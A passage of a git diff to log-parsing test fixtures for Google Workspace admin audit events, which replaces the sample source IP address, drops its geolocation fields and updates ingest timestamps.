"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", + "ingested": "2021-12-09T13:38:50.954864400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", "provider": "admin", "action": "CHROME_APPLICATION_LICENSE_RESERVATION_CREATED", "id": "1", @@ -174,7 +138,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -198,35 +162,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.814999400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", + "ingested": "2021-12-09T13:38:50.954869700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", "provider": "admin", "action": "CHROME_APPLICATION_LICENSE_RESERVATION_DELETED", "id": "1", @@ -256,7 +202,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -280,35 +226,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815001400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", + "ingested": "2021-12-09T13:38:50.954875700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", "provider": "admin", "action": "CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED", "id": "1", @@ -338,7 +266,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -362,35 +290,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815003300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}", + "ingested": "2021-12-09T13:38:50.954881Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}", "provider": "admin", "action": "CREATE_DEVICE_ENROLLMENT_TOKEN", "id": "1", @@ -420,7 +330,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -444,35 +354,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815005200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"ASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954884900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"ASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ASSIGN_CUSTOM_LOGO", "id": "1", @@ -502,7 +394,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -526,35 +418,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815007100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"UNASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954889100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"UNASSIGN_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "UNASSIGN_CUSTOM_LOGO", "id": "1", @@ -584,7 +458,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -608,35 +482,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815009Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954894300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CREATE_ENROLLMENT_TOKEN", "id": "1", @@ -666,7 +522,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -690,35 +546,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815010800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954898500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "REVOKE_ENROLLMENT_TOKEN", "id": "1", @@ -748,7 +586,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -772,35 +610,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815012800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ALLOWED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ALLOWED\",\"value\":\"EMPTY\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954902700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ALLOWED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ALLOWED\",\"value\":\"EMPTY\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHROME_LICENSES_ALLOWED", "id": "1", @@ -830,7 +650,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -854,35 +674,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815014600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954906200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CREATE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CREATE_ORG_UNIT", "id": "1", @@ -912,7 +714,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -936,35 +738,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815035300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REMOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954911Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REMOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "REMOVE_ORG_UNIT", "id": "1", @@ -994,7 +778,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1018,35 +802,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815038400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_DESCRIPTION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954916300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_DESCRIPTION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "EDIT_ORG_UNIT_DESCRIPTION", "id": "1", @@ -1076,7 +842,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1098,35 +864,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815040400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"MOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954921600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"MOVE_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "MOVE_ORG_UNIT", "id": "1", @@ -1156,7 +904,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1178,35 +926,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815042300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_NAME\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954926700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"EDIT_ORG_UNIT_NAME\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "EDIT_ORG_UNIT_NAME", "id": "1", @@ -1236,7 +966,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1260,35 +990,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.815044200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}", + "ingested": "2021-12-09T13:38:50.954931900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"REVOKE_DEVICE_ENROLLMENT_TOKEN\",\"parameters\":[{\"name\":\"FULL_ORG_UNIT_PATH\",\"value\":\"full/org/path\"}]}}", "provider": "admin", "action": "REVOKE_DEVICE_ENROLLMENT_TOKEN", "id": "1", @@ -1318,7 +1030,7 @@ "foo" ], "ip": [ - 